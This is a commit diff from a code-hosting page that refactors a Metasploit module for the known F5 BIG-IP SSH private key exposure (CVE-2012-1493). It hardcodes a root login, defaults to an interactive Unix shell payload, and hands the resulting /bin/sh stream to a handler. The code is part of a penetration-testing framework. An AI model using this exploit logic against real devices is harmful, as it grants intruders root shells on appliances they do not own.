Clean up title, options
parent
85e1555e13
commit
539deabef5
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize
|
||||
super({
|
||||
'Name' => 'F5 BIG-IP Known Private Key',
|
||||
'Name' => 'F5 BIG-IP SSH Private Key Exposure',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
F5 ships a public/private key pair on BIG-IP appliances that allows
|
||||
|
@ -41,7 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
|
||||
[ 'CVE', '2012-1493' ],
|
||||
],
|
||||
'DefaultOptions' => { "USERNAME" => "root" },
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
'DefaultTarget' => 0,
|
||||
})
|
||||
|
||||
register_options(
|
||||
|
@ -58,8 +59,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
]
|
||||
)
|
||||
|
||||
deregister_options('PASSWORD','PASS_FILE','BLANK_PASSWORDS','USER_AS_PASS')
|
||||
|
||||
end
|
||||
|
||||
def rport
|
||||
|
@ -102,17 +101,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
|
||||
ssh_socket = nil
|
||||
|
||||
handler(conn.lsock)
|
||||
|
||||
return [:success, nil]
|
||||
return conn
|
||||
else
|
||||
return [:fail, nil]
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
ret,proof = do_login(ip, datastore["USERNAME"], rport)
|
||||
print_good "Success: '#{proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
|
||||
conn = do_login(ip, "root", rport)
|
||||
if conn
|
||||
print_good "Successful login"
|
||||
handler(conn.lsock)
|
||||
else
|
||||
print_error "Login failed"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue